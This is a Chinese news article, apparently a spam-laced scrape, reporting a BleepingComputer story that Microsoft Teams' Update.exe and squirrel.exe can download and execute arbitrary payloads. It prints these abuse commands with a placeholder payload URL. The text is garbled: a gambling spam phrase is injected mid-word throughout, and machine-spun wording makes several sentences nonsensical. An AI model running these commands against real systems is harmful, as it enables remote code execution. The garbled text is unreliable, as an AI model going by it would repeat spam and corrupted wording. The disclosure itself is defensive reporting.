好运快3在哪玩Microsoft Teams 升级机制允许黑客执行任意文件 | 雷锋网

  • 时间:
  • 浏览:61
  • 来源:大发UU直播-大发UU快三

雷锋网(公众号:雷锋网)消息,据 BleepingCompu好运快3在哪玩ter 美国时间 6 月 29 日报道,多位安全研究人员发现当前在Micro好运快3在哪玩soft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和好运快3在哪玩执行任意文件,

研究人员表示,对易受攻击的应用线程池使用“update”命令可需要在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了某些问题图片图片。

使用Microsoft Teams,将有效负载再加到其文件夹中,并使用以下任一命令自动执行:

Update.exe 好运快3在哪玩--update [url to payload]

squirrel.exe --update [url to payload]

什么命令可需要与某些参数并肩使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的法律法子适用于“squirrel.exe”,它也是Microsoft Teams安装包的一每种。某些另另一个多可执行文件现在都在GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一每种。

安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了某些问题图片图片。此时,应用线程池仍然容易受到攻击,肯能微软通知研究员该修复线程池将在未来的软件版本中再次出现。

来源:BleepingComputer 。

雷锋网版权文章,未经授权禁止转载。详情见转载须知。